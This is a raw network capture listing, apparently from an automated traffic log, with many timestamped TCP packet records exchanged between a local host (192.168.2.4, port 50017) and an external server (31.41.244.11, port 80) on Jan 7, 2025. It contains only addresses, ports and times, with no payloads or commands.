Jan 7, 2025 10:09:04.001051903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.001054049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.001054049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.001070976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.001084089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.001092911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.001108885 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.001108885 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.001151085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.023183107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.023194075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.023200989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.023273945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.023291111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.023308992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.023325920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.023333073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.023335934 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.023341894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.023371935 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.023371935 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056246996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056294918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056298971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056308031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056328058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056339979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056350946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056366920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056366920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056382895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056397915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056411982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056440115 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056443930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056457043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056458950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056471109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056497097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056497097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056512117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056545973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056565046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056577921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056590080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056602955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056608915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056608915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056627989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056654930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056667089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056677103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056689978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056705952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056705952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056751966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056796074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056808949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056819916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056833029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056849003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056857109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056857109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056863070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056875944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056888103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056893110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056901932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056915045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056926966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056945086 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056946039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056953907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056966066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056967020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.056978941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.056993008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.057005882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.057005882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.057038069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058473110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058492899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058505058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058516979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058535099 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058535099 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058579922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058592081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058609009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058619976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058621883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058621883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058641911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058650970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058662891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058665991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058675051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058696985 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058716059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058729887 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058734894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058748007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058758974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058770895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058787107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058792114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058800936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058804035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058816910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058860064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058870077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058870077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058872938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058895111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058901072 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058908939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058923006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058943033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058943033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058954954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058968067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058979988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.058993101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058993101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.058998108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059010983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059041023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059041977 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059050083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059053898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059083939 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059111118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059122086 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059134007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059154034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059164047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059165001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059178114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059190035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059190035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059204102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059216022 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059216022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059230089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059231043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059242010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059253931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059263945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059283018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059294939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059307098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059310913 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059335947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059339046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059345007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059349060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059361935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059376001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059386969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059425116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059431076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059431076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059438944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059478998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059506893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059518099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059545040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.059571981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059571981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.059583902 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.085556984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.085570097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.085587025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.085597992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.085613966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.085644007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.085644007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.085644960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.085659027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.085660934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.085691929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.085702896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.085740089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.085752010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.085762978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.085773945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.085773945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.085827112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.085834026 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.085834026 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.085834026 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.085834980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.085839987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.085855007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.085900068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.085923910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.085923910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.085988998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.087718964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.087729931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.087747097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.087759018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.087769032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.087774992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.087798119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.087809086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.087810993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.087821007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.087829113 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.087874889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.110065937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.110090017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.110099077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.110109091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.110121012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.110135078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.110141039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.110141039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.110147953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.110157967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.110177994 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.110196114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143030882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143043041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143053055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143062115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143078089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143095016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143105984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143115044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143121004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143126965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143137932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143143892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143214941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143214941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143241882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143259048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143270016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143279076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143289089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143296957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143301010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143301010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143322945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143333912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143342972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143351078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143354893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143378973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143379927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143392086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143393993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143403053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143429995 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143466949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143480062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143490076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143498898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143508911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143513918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143513918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143562078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143562078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143575907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143587112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143596888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143606901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143637896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143668890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143744946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143755913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143765926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.143795967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.143830061 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145184040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145272017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145281076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145291090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145302057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145318985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145334959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145334959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145348072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145359993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145370960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145370960 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145399094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145406961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145406961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145407915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145420074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145431042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145437002 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145443916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145453930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145463943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145473003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145473957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145505905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145505905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145522118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145533085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145540953 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145545006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145555973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145565987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145575047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145577908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145601988 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145616055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145637035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145647049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145653963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145685911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145694017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145695925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145709991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145720005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145739079 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145761967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145761967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145775080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145790100 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145831108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145832062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145842075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145853043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145889044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145895004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145895004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145899057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145910978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145920038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145930052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.145941973 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145972013 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.145992041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.146107912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.146119118 CET	80	50017	31.41.244.11	192.168.2.4
